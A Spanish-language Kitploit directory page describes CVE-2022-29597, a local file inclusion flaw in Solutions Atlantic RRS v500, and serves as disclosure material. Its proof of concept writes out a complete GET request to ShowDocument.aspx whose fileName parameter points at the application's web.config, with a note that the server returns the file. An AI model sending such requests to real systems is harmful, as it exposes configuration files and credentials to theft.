Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-29597 — La aplicación RRS v500 es vulnerable a una vulnerabilidad de Inclusión de Archivos Locales (LFI). | Kitploit
Herramientas/GitHubGitHub/thegetch/cve-2022-29597
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubthegetch/cve-2022-29597

CVE-2022-29597

La aplicación RRS v500 es vulnerable a una vulnerabilidad de Inclusión de Archivos Locales (LFI).

Ver Repositorio
hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-29597: Inclusión de Archivos Locales en RSS v500

La aplicación RRS v500 de Solutions Atlantic es vulnerable a una vulnerabilidad de Inclusión de Archivos Locales (LFI). Cualquier usuario autenticado tiene la capacidad de hacer referencia a archivos internos del sistema en las solicitudes realizadas a la página /RRSWeb/maint/ShowDocument/ShowDocument.aspx. El servidor responderá exitosamente con el contenido del archivo interno solicitado. Esta capacidad podría permitir a los adversarios extraer datos y/o archivos sensibles del sistema de archivos subyacente, obtener conocimiento sobre el funcionamiento interno del sistema o acceder al código fuente de la aplicación.

URL de Mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29597

URL de NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-29597

Prueba de Concepto (POC):

Funcionalidad de Mostrar Documento:

URL afectada:

  • /RRSWeb/maint/ShowDocument/ShowDocument.aspx

Al abrir o descargar un PDF desde el sitio RRS, se realiza una solicitud a la URL afectada que incluye un parámetro fileName. Este parámetro podría modificarse para incluir una ruta interna del sistema, como web.config. El servidor entonces entregará el archivo solicitado.

Solicitud GET con ruta interna a web.config:

root@kitploit:~
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?fileName=C:\\Program%20Files\\Solutions%20Atlantic\\RRS\\RRSWeb\\web.config HTTP/1.1
Host: <REDACTED>
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<REDACTED>/RRSweb/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=<REDACTED>; ASP.NET_SessionId=<REDACTED>
Connection: Keep-Alive


Respuesta del servidor:

RRS_LFI_web.config

Descubrimiento

Abril 2022

  • Eric Getchell - TheGetch
Descargar herramienta